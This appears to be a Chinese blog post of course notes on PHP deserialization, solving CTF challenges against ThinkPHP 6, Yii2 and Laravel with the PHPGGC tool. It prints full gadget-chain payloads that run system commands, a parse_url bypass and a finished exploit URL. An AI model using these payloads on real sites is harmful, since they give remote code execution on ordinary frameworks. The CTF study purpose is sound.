本文发布于548天前,本文最后更新于547 天前,其中的信息可能已经过时,如有错误请留言或评论。
知识点
- PHP-反序列化-开发框架类项目
- PHP-反序列化-Payload生成项目
- PHP-反序列化-Payload生成综合项目
小迪说后面更详细的在代码审计时候讲
演示案例
➢反序列化链项目-PHPGGC&NotSoSecure
NotSoSecure
- 项目地址:https://github.com/NotSoSecure/SerializedPayloadGenerator
- 搭建:不过这个是用IIS搭建的,也就是windows,我没进行搭建
- 介绍:
- 为了利用反序列化漏洞,需要设置不同的工具,如 YSoSerial(Java)、YSoSerial.NET、PHPGGC 和它的先决条件。DeserializationHelper 是包含对 YSoSerial(Java)、YSoSerial.Net、PHPGGC 和其他工具的支持的Web界面。使用Web界面,您可以为各种框架生成反序列化payload。针对框架类的反序列化工具,对自己编写的反序列化无法使用
- 包含如下:
- Java – YSoSerial
- NET – YSoSerial.NET
- PHP – PHPGGC
- Python - 原生
PHPGGC
- 项目地址:https://github.com/ambionics/phpggc
- 搭建:Linux直接下载下来后./phpggc -h 查看使用方法即可,比较简单
- 介绍:
- PHPGGC是一个包含unserialize()有效载荷的库以及一个从命令行或以编程方式生成它们的工具。当在您没有代码的网站上遇到反序列化时,或者只是在尝试构建漏洞时,此工具允许您生成有效负载,而无需执行查找小工具并将它们组合的繁琐步骤。 它可以看作是frohoff的ysoserial的等价物,但是对于PHP。目前该工具支持的小工具链包括:CodeIgniter4、Doctrine、Drupal7、Guzzle、Laravel、Magento、Monolog、Phalcon、Podio、ThinkPHP、Slim、SwiftMailer、Symfony、Wordpress、Yii和ZendFramework等。
- 在ctf及其他利用框架反序列化漏洞时,自己编写poc耗时太久,额,其实可以说自己写不出来poc,太过复杂,这里就需要我们用到工具
➢反序列化框架利用-ThinkPHP&Yii&Laravel
BUUCTF [安洵杯 2019]iamthinking
考点
- Thinkphp V6.0.X 反序列化
过程
- 正常目录扫描扫到www.zip,下载源码进行分析
- 分析源码发现,网站是thinkphp开发的,版本为6.0
- 在app/controller/index.php中发现,接收payload参数并反序列化,对url进行了简单的过滤
- 使用phpggc工具直接搜索thinkphp,查看是否有符合版本的链可以利用
- 选择将要使用的链,查看使用语法格式,这里使用ThinkPHP/RCE3
- 按照语法格式生成要执行的命令
└─# ./phpggc ThinkPHP/RCE4 system 'cat /flag' --url O%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A9%3A%22%00%2A%00suffix%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3BN%3Bs%3A18%3A%22%00think%5CModel%00force%22%3BN%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3BN%3Bs%3A9%3A%22%00%2A%00suffix%22%3BN%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22key%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3BN%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3BN%3Bs%3A7%3A%22%00%2A%00json%22%3BN%3Bs%3A12%3A%22%00%2A%00jsonAssoc%22%3BN%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3B%7D --url可对payload进行url编码,--base64可进行base64编码,根据需要自行选择
- parse_url绕过
- 在解析形如http://xxx.com///index.php?payload=cmd这样的URI时parse_url会返回false
- 构造url中成功获取flag
http://d1c17b5d-82ae-4025-8682-3c9e40377e27.node4.buuoj.cn:81///public/?payload=O%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3Bb%3A1%3Bs%3A18%3A%22%00think%5CModel%00force%22%3Bb%3A1%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3Bb%3A1%3Bs%3A9%3A%22%00%2A%00suffix%22%3BO%3A17%3A%22think%5Cmodel%5CPivot%22%3A9%3A%7Bs%3A19%3A%22%00think%5CModel%00exists%22%3BN%3Bs%3A18%3A%22%00think%5CModel%00force%22%3BN%3Bs%3A21%3A%22%00think%5CModel%00lazySave%22%3BN%3Bs%3A9%3A%22%00%2A%00suffix%22%3BN%3Bs%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A6%3A%22system%22%3B%7D%7Ds%3A7%3A%22%00%2A%00json%22%3Ba%3A1%3A%7Bi%3A0%3Bs%3A3%3A%22key%22%3B%7Ds%3A12%3A%22%00%2A%00jsonAssoc%22%3Bb%3A1%3Bs%3A12%3A%22%00%2A%00withEvent%22%3BN%3B%7Ds%3A17%3A%22%00think%5CModel%00data%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Ba%3A1%3A%7Bs%3A3%3A%22key%22%3Bs%3A9%3A%22cat+%2Fflag%22%3B%7D%7Ds%3A21%3A%22%00think%5CModel%00withAttr%22%3BN%3Bs%3A7%3A%22%00%2A%00json%22%3BN%3Bs%3A12%3A%22%00%2A%00jsonAssoc%22%3BN%3Bs%3A12%3A%22%00%2A%00withEvent%22%3Bb%3A0%3B%7D
CTFSHOW 反序列化 267 Yii2反序列化
弱口令登录/源码提示泄漏
- 弱密码登录后访问GET:index.php?r=site%2Fabout&view-source
- 发现可以看到源码,反序列化接收的参数code
- 使用工具构造payload
└─# ./phpggc Yii2/RCE1 exec 'cp /fla* tt.txt' --base64 TzoyMzoieWlpXGRiXEJhdGNoUXVlcnlSZXN1bHQiOjE6e3M6MzY6IgB5aWlcZGJcQmF0Y2hRdWVyeVJlc3VsdABfZGF0YVJlYWRlciI7TzoxNzoieWlpXGRiXENvbm5lY3Rpb24iOjI6e3M6MzoicGRvIjtpOjE7czozOiJkc24iO086MjY6InlpaVxkYlxDb2x1bW5TY2hlbWFCdWlsZGVyIjoyOntzOjc6IgAqAHR5cGUiO3M6MToieCI7czoxMToiY2F0ZWdvcnlNYXAiO086MjI6InlpaVxjYWNoaW5nXEFycmF5Q2FjaGUiOjI6e3M6MTA6InNlcmlhbGl6ZXIiO2E6MTp7aToxO3M6NDoiZXhlYyI7fXM6MzA6IgB5aWlcY2FjaGluZ1xBcnJheUNhY2hlAF9jYWNoZSI7YToxOntzOjE6IngiO2E6Mjp7aTowO3M6MTU6ImNwIC9mbGEqIHR0LnR4dCI7aToxO2k6MDt9fX19fX0=
- 传入code参数后进行访问,GET:/index.php?r=backdoor/shell&code=
- 访问/tt.txt文件,获取到flag
CTFSHOW 反序列化 271 Laravel反序列化
接收post参数data,并进行反序列化,使用工具生成payload传入即可
./phpggc Laravel/RCE2 system "id" --url
Thinkphp 反序列化链分析
完整分析thinkphp漏洞讲解,都是md文件,不过有点难看懂,没开发基础的话不好看。
Thinkphp-All-vuln-main:https://github.com/hughink/Thinkphp-All-vuln
参考
学习内容均来自小迪安全系列课程:
parse_url小结:https://www.cnblogs.com/tr1ple/p/11137159.html
